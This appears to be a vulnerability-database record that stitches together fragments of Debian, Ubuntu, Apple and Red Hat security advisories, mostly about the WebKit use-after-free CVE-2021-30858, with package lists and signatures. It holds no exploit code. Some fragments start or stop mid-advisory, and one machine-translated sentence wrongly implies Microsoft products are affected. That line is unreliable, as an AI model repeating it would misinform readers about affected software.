Size/MD5 checksum: 385848 0294d7e3e1d6b37532f98344a9849cde
arm architecture (ARM)
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_arm.deb
Size/MD5 checksum: 686154 fbe32c7124ba2ce093b31f46736e002b
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_arm.deb
Size/MD5 checksum: 357158 0d793d543a33cfa192098234c925d639
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_arm.udeb
Size/MD5 checksum: 242196 1cfc9f7dc6a7cd0843aa234bab35b69e
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_arm.deb
Size/MD5 checksum: 205120 39ab4dfbc19c8a63affc493e0b5aaf2d
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_armel.deb
Size/MD5 checksum: 684568 325686fbc2fba7687da424ada57b9419
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_armel.deb
Size/MD5 checksum: 209992 69f6a68fb90658ec74dfd7cc7cc0b766
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_armel.udeb
Size/MD5 checksum: 236564 a48afca5c6798d16b140b3362dfac0ca
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_armel.deb
Size/MD5 checksum: 353814 76960109910d6de2f74ec0e345f00854
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_i386.udeb
Size/MD5 checksum: 254452 a34af74eda0feb2b763cfc6f5b8330c1
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_i386.deb
Size/MD5 checksum: 371586 ec294ffffeb9ddec389e3e988d880534
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_i386.deb
Size/MD5 checksum: 198558 3283ad058d37eed8bca46df743c6a915
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_i386.deb
Size/MD5 checksum: 684624 014d335b35ed41022adb628796a0c122
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_ia64.deb
Size/MD5 checksum: 332160 2dbb364f09414e4b0e0f59d9e91d1edc
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_ia64.deb
Size/MD5 checksum: 876692 2f6d3421d6c8424523388347c5640666
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_ia64.deb
Size/MD5 checksum: 531496 5dd7755f63271f597b64c3f513e8e7f1
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_ia64.udeb
Size/MD5 checksum: 415934 ea2ba16157b3504d8b9c8f251b69b16f
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_mips.deb
Size/MD5 checksum: 717022 9ee8c246af10f4bf7cdf5cdc54010dd6
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_mips.deb
Size/MD5 checksum: 213212 3641ad81738e8935c5df2b648383c8e0
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_mips.deb
Size/MD5 checksum: 369018 18559e273ffcea5614e71ab32b95ef47
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_mips.udeb
Size/MD5 checksum: 253924 1be1e224f27a780beb6799d55fa74663
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_mipsel.deb
Size/MD5 checksum: 369772 6181d98166fe1f004fb033f2665ce4af
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_mipsel.deb
Size/MD5 checksum: 214802 6edbec67ff79e96921d1fe4bf57b0fce
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_mipsel.deb
Size/MD5 checksum: 712502 4a99ccc68b1913f88901c5e0686fea4f
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_mipsel.udeb
Size/MD5 checksum: 254212 e30825a94175fd78a561b8365392cbad
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_powerpc.udeb
Size/MD5 checksum: 262804 d35ced8ba625f39dc7a04e3e61e0d49d
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_powerpc.deb
Size/MD5 checksum: 233882 6e294c19dd0109ee80fe6cd401b6a185
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_powerpc.deb
Size/MD5 checksum: 378612 c96a180e7132c543396486b14107cdad
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_powerpc.deb
Size/MD5 checksum: 708212 9602a7786b2ebffd1d75d443901574c5
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_s390.deb
Size/MD5 checksum: 225190 393c9515f7cd89bcd8b0c38d6d6dd7ac
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_s390.deb
Size/MD5 checksum: 384160 4e20bc56e5fc65fb08529d8765d28850
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_s390.deb
Size/MD5 checksum: 698798 f589b6b8882d998bb7b89fa1dfa40b3a
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_s390.udeb
Size/MD5 checksum: 268272 7b6511b9ad657aa165e906a4fcbfee11
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_sparc.deb
Size/MD5 checksum: 200078 29c1833cbde5b4da5c2e35aaf856ab58
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_sparc.udeb
Size/MD5 checksum: 235424 e64a8fc3b744253b22161e31fbb6e92a
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_sparc.deb
Size/MD5 checksum: 352544 a7f480889460b104bbab16fd8d8da2d5
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_sparc.deb
Size/MD5 checksum: 676520 6d0f57a5bd6457a9b9b85271c7001531
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkyGowMACgkQNxpp46476aos+gCggzMhJbnoGyXAhf8hfIrNJLn7
reQAnj4mmmGRshTxck3LwMxdmtAhb8uJ
=RkKg
-----END PGP SIGNATURE-----
|
|
var-202108-2172
|
A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. apple's iPadOS Products from multiple vendors, including Microsoft, contain freed memory usage vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Updates are Available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). ==========================================================================
Ubuntu Security Notice USN-5087-1
September 22, 2021
webkit2gtk vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.04
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in WebKitGTK. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 21.04:
libjavascriptcoregtk-4.0-18 2.32.4-0ubuntu0.21.04.1
libwebkit2gtk-4.0-37 2.32.4-0ubuntu0.21.04.1
Ubuntu 20.04 LTS:
libjavascriptcoregtk-4.0-18 2.32.4-0ubuntu0.20.04.1
libwebkit2gtk-4.0-37 2.32.4-0ubuntu0.20.04.1
Ubuntu 18.04 LTS:
libjavascriptcoregtk-4.0-18 2.32.4-0ubuntu0.18.04.1
libwebkit2gtk-4.0-37 2.32.4-0ubuntu0.18.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK, such as Epiphany, to make all the necessary changes.
Information about the security content is also available at
https://support.apple.com/HT212804.
Description: An integer overflow was addressed with improved input
validation.
CVE-2021-30860: The Citizen Lab
CUPS
Available for: macOS Big Sur
Impact: A local attacker may be able to elevate their privileges
Description: A permissions issue existed.
CVE-2021-30827: an anonymous researcher
Entry added September 20, 2021
CUPS
Available for: macOS Big Sur
Impact: A local user may be able to read arbitrary files as root
Description: This issue was addressed with improved checks.
CVE-2021-30828: an anonymous researcher
Entry added September 20, 2021
CUPS
Available for: macOS Big Sur
Impact: A local user may be able to execute arbitrary files
Description: A URI parsing issue was addressed with improved parsing.
CVE-2021-30829: an anonymous researcher
Entry added September 20, 2021
curl
Available for: macOS Big Sur
Impact: curl could potentially reveal sensitive internal information
to the server using a clear-text network protocol
Description: A buffer overflow was addressed with improved input
validation.
CVE-2021-22925
Entry added September 20, 2021
CVMS
Available for: macOS Big Sur
Impact: A local attacker may be able to elevate their privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro
Entry added September 20, 2021
FontParser
Available for: macOS Big Sur
Impact: Processing a maliciously crafted dfont file may lead to
arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab
CVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab
CVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab
Entry added September 20, 2021
Gatekeeper
Available for: macOS Big Sur
Impact: A malicious application may bypass Gatekeeper checks
Description: This issue was addressed with improved checks.
CVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc.
CVE-2021-30847: Mike Zhang of Pangu Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30830: Zweig of Kunlun Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2021-30865: Zweig of Kunlun Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A race condition was addressed with improved locking.
CVE-2021-30857: Zweig of Kunlun Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A type confusion issue was addressed with improved state
handling.
CVE-2021-30859: Apple
Entry added September 20, 2021
libexpat
Available for: macOS Big Sur
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed by updating expat to version
2.4.1.
CVE-2013-0340: an anonymous researcher
Entry added September 20, 2021
Preferences
Available for: macOS Big Sur
Impact: An application may be able to access restricted files
Description: A validation issue existed in the handling of symlinks.
CVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)
of Tencent Security Xuanwu Lab (xlab.tencent.com)
Entry added September 20, 2021
Sandbox
Available for: macOS Big Sur
Impact: A user may gain access to protected parts of the file system
Description: An access issue was addressed with improved access
restrictions.
CVE-2021-30850: an anonymous researcher
Entry added September 20, 2021
SMB
Available for: macOS Big Sur
Impact: A local user may be able to read kernel memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs
Entry added September 20, 2021
SMB
Available for: macOS Big Sur
Impact: A remote attacker may be able to leak memory
Description: A logic issue was addressed with improved state
management.
CVE-2021-30858: an anonymous researcher
Additional recognition
APFS
We would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc.
for their assistance.
Entry added September 20, 2021
App Support
We would like to acknowledge @CodeColorist, an anonymous researcher
for their assistance.
Entry added September 20, 2021
CoreML
We would like to acknowledge hjy79425575 working with Trend Micro
Zero Day Initiative for their assistance.
Entry added September 20, 2021
CUPS
We would like to acknowledge an anonymous researcher for their
assistance.
Entry added September 20, 2021
Kernel
We would like to acknowledge Anthony Steinhauser of Google's Safeside
project for their assistance.
Entry added September 20, 2021
Sandbox
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive
Security for their assistance.
Entry added September 20, 2021
smbx
We would like to acknowledge Zhongcheng Li (CK01) for their
assistance.
Entry added September 20, 2021
Installation note:
This update may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p
rhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY
eJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B
+CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4
5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv
4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD
t6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn
bwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu
R7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC
NlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9
4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3
85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw=
=9bjT
-----END PGP SIGNATURE-----
. 8) - aarch64, ppc64le, s390x, x86_64
3.
Bug Fix(es):
* WebProcess::initializeWebProcess crashing on aarch64 (BZ#2010825)
4. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: webkitgtk4 security update
Advisory ID: RHSA-2022:0059-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:0059
Issue date: 2022-01-11
CVE Names: CVE-2021-30858
====================================================================
1. Summary:
An update for webkitgtk4 is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
3. Description:
WebKitGTK is the port of the portable web rendering engine WebKit to the
GTK platform.
Security Fix(es):
* webkitgtk: Use-after-free leading to arbitrary code execution
(CVE-2021-30858)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
webkitgtk4-2.28.2-3.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-3.el7.i686.rpm
webkitgtk4-2.28.2-3.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-2.28.2-3.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-3.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-3.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-devel-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
webkitgtk4-2.28.2-3.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-3.el7.i686.rpm
webkitgtk4-2.28.2-3.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-2.28.2-3.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-3.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-3.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-devel-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
webkitgtk4-2.28.2-3.el7.src.rpm
ppc64:
webkitgtk4-2.28.2-3.el7.ppc.rpm
webkitgtk4-2.28.2-3.el7.ppc64.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.ppc64.rpm
webkitgtk4-jsc-2.28.2-3.el7.ppc.rpm
webkitgtk4-jsc-2.28.2-3.el7.ppc64.rpm
ppc64le:
webkitgtk4-2.28.2-3.el7.ppc64le.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.ppc64le.rpm
webkitgtk4-devel-2.28.2-3.el7.ppc64le.rpm
webkitgtk4-jsc-2.28.2-3.el7.ppc64le.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.ppc64le.rpm
s390x:
webkitgtk4-2.28.2-3.el7.s390.rpm
webkitgtk4-2.28.2-3.el7.s390x.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.s390x.rpm
webkitgtk4-jsc-2.28.2-3.el7.s390.rpm
webkitgtk4-jsc-2.28.2-3.el7.s390x.rpm
x86_64:
webkitgtk4-2.28.2-3.el7.i686.rpm
webkitgtk4-2.28.2-3.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-devel-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-3.el7.noarch.rpm
ppc64:
webkitgtk4-debuginfo-2.28.2-3.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.ppc64.rpm
webkitgtk4-devel-2.28.2-3.el7.ppc.rpm
webkitgtk4-devel-2.28.2-3.el7.ppc64.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.ppc.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.ppc64.rpm
s390x:
webkitgtk4-debuginfo-2.28.2-3.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.s390x.rpm
webkitgtk4-devel-2.28.2-3.el7.s390.rpm
webkitgtk4-devel-2.28.2-3.el7.s390x.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.s390.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.s390x.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
webkitgtk4-2.28.2-3.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-3.el7.i686.rpm
webkitgtk4-2.28.2-3.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-3.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-devel-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-2.28.2-3.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-3.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-3.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2021-30858
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYd37ddzjgjWX9erEAQjIBw//X0CWLozcqp62pyxvvZD/fpR7OK8ux/kO
jIhtCKZdBwK8SaLcLRvFrNvOb/qY3AZa/XbPQjzaKztuWplxDU2LZBz74mngWEW0
r43dWUacOBZq0mbNek5WiInippBLDVDlDzg8X6qwTpH6Z9EqY6EtX9ZzrXtwOthI
alOkbYIVJg/4Wkrp8gXyupgT934OyEQfZkrR1SUbxlhKjdfFx7vgeqz3+G7odT75
90MTCo0Vo6XgDOS7j5xjrwQU05vtgvRJH8/OMauSyAzYQ+qPvwJP76CGC7SphGhR
LzUWlk5MaCiAGalb9FFK8A4cx8dUv0VAVOP74IZs6IUjpjz4FzSmpnAfZk1xLgyQ
SJ7NS1pH2zED20eo5qgSMDvfsPw9igD0DwN29cyPi9IVbLIFjdB4+42yCK6WKOyu
l31tVQBHQAbOf7ArUQQdoA7pEGzibEdy3brUbQu4Bv4LCMB2zJpLOFxTzEdp0xyz
RYAxA+A8+1brMlvGh8v4wmfAxTvWXuecCnG/ilyXOq1FFQq86CBmj9Da9jLB1VuP
S9xKEazAcAdrxivE53wQfUt7HurjJgtjTvUCtDPCiNYZ3617vgd29ep0PtN2EAIe
ADXxd0twQIQA84Cjx5TGJgrWoU/dNLFvJFQ72Wkk5Qc0R2ZEnvBYN8ylDPTDLW0s
SM2WAjGpY2M=kSrx
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
.
For the stable distribution (bullseye), this problem has been fixed in
version 2.32.4-1~deb11u1.
We recommend that you upgrade your wpewebkit packages |